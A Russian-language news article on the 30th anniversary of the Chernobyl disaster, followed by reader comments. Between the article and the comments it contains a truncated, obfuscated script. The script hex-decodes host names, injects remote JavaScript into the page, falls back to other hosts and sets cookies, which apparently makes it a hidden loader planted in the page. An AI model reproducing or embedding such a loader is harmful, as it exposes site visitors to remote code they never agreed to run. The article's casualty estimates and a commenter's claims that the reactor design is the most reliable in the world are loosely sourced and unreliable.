Прошло 30 лет со дня трагического взрыва на Чернобыльской атомной электростанции
Прошло 30 лет со дня трагического взрыва на Чернобыльской атомной электростанции.
Прошло уже 30 лет со дня трагедии на Чернобыльской АЭС, а 30-километровая зона вокруг станции до сих пор остается опасной для нахождения в ней. Город Припять напоминает кадры из фильмов ужасов – безлюдные дома и улицы, оставленные вещи, которые в спешке не взяли с собой жители, убегая из города, стараясь спастись от облучения. Дозы радиоактивного облучения в несколько десятков превышают допустимые. Находится вблизи этой зоны опасно для жизни.
Что же произошло в тот роковой день 30 лет назад?
26 апреля 1986 года ночью проходили испытания четвертого энергоблока станции. При завершении испытания, реактор остановить не удалось. В 1.23 на энергоблоке произошел взрыв. Из реактора вылетели четверть находящегося там графита, обломки раскаленных ТВЭЛов. Эти обломки вызвали 30 очагов пожара.
От взрыва и пожара обрушились стены блоков, огонь быстро заполнял всю станцию.
Пожарные прибывшие на место аварии боролись согнем беспрерывно на протяжении 5 часов. Окончательно пожар удалось ликвидировать лишь спустя 10 дней. О радиационной угрозе им не было сообщено. Только к утру, получив огромную дозу облучения, спасатели стали терять сознание. Впоследствии каждый четвертый умер в первые месяцы после аварии.
«Впечатляющий вид представился нам из разбитого окна деаэраторной этажерки на 14-й отметке в районе восьмой турбины: по всей прилегающей территории были хаотически разбросаны детали реактора и элементы графитовой кладки, его внутренних частей, — рассказывает член аварийной комиссии Минэнерго доктор технических наук Евгений Игнатенко. — Во время осмотра двора АЭС не более 1 минуты показания моего дозиметра достигало 10 рентген».
Опасность аварии тщательно пытались скрыть, и жителям города не было сообщено об угрозе облучения при взрыве, и город продолжал жить своей жизнью. Утром дети отправились в школу, взрослые на работу. Лишь 27 апреля было передано краткое официальное сообщение о ЧП ТАСС. Тогда же началось массовая эвакуация жителей.
Последствия.
Согласно данным «Союза Чернобыль Украины» тысячи людей, принимавших участие в ликвидации последствий Чернобыльской катастрофы, скончались от радиационного заражения.
По разным оценкам погибло от 15 до 30 тысяч человек, более 2,5 миллионов жителей Украины страдают от заболеваний, приобретенных в результате облучения.
Из сельскохозяйственного оборота было выведено около 5 млн га земель.
Сильному загрязнению подверглись территории Белоруссии, России и Украины, в общей сложности площадь составила более 200 тыс. км2.
Появились массовые мутации у растений и животных.
По некоторым данным радиоактивное облако облетело Землю дважды. Последствия облучения встречаются на всех континентах. 
Сейчас.
23 апреля 2016 года в Славутиче состоялось награждение ветеранов – участников ликвидации последствий аварии на Чернобыльской АЭС. «Будет этически и морально правильно, что мы отметим людей, которые принимали участие в ликвидации последствий аварии именно весной 1986 года, которые одними из первых встали на борьбу с разбушевавшимся атомом», - сказал Николай Томенко, вручая Почетные грамоты Комитета Верховной Рады Украины. Грамоты получили 20 ветеранов.
26 апреля 2016 года в ночь в Славутиче состоялся марш памяти погибшим в результате аварии на атомной станции. 
На место аварии прибывают руководства ЕБРР, ГАЗО, ЧАЭС, представители стран-доноров счета ядерной безопасности.
Материал к публикации подготовил
Редактор.
<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Комментарии
Светлана Сергиенко.
Во время событий на Чернобыльской АЭС и после них мне довелось по роду деятельности "быть в курсе" событий, я присутствовал на "закрытых" (в то время) докладах специалистов и известных учёных с анализом произошедшего. Ситуация была ясна тогда и не вызывала (и не вызывает сейчас) никаких сомнений - произошедшие события это действие чисто ЧЕЛОВЕЧЕСКОГО ФАКТОРА - целенаправленные действия "экипажа" с нарушением технологии работы. Как докладывал акад. Дибобес, в процессе развития нештатной ситуации, спровоцированной этими неверными действиями, неоднократно срабатывала защитная сигнализация, предупреждавшая о том, что действия неверны и их нужно прекратить, но эту сигнализацию отключали и действовали дальше, думая, что всё обойдётся".
см. часть 2
Целью этого "эксперимента" было получение "бесплатной и дополнительной" электроэнергии в режиме "охлаждения", с дальнейшими наградами и поощрениями, орденами и медалями за "инициативу". Но этот "эксперимент был не согласован ни с АН СССР (Академиком Александровым) ни как следует не обоснован, ни "просчитан", и поэтому получили "результат" - разогрев и "разгон" реактора, вплоть до катастрофического исхода, когда вошли в режим, из которого "нет возврата" назад.
См. ссылка на news.mail.ru
За эту катастрофу в своё время сняли (как выяснилось, совершенно зря) академика Александрова, т.к. этот тип реактора - его детище, а для ЦК требовалось на ком то "отыграться", вот и выбрали "козла отпущения". Дальнейший тщательный анализ показал, что при грамотных действиях персонала этот тип реактора является САМЫМ НАДЁЖНЫМ В МИРЕ! Конечно, всякие атомщики - французы и американцы и пр., строящие атомные станции у себя и по всему миру, извлекли максимум для себя, "постарались" раскритиковать этот тип реактора, чтобы "покупали у них", и это обернулось колоссальными потерями и убытками для нашего Атомстроя в десятки МИЛЛИАРДОВ долларов!
См. ч. 3
https://news.mail.ru/society/2542921/
Комментарий удален модератором
Атомная станция, кроме высокой технологии, заложенной в неё создателями, требует высокого уровня ТЕХНОЛОГИЧЕСКОЙ ДИСЦИПЛИНЫ - а это оказалось "нашим" слабым звеном и привело к этой ужасной глобальной катастрофе. Сейчас, спустя ряд лет, конечно разобрались и поняли, что самА эта атомная станция, её устройство и технология очень надёжны, и мы снова начали их строить (и даже появились зарубежные заказы). Но при этом в настоящее время резко возросли требования к подготовке персонала АС и контроль их действий, в связи с чем происшествия такого масштаба, на мой взгляд, в будущем уже невозможны!
Всего Вам доброго.
Профессор В.К.
Кадр из фильма Чернобыль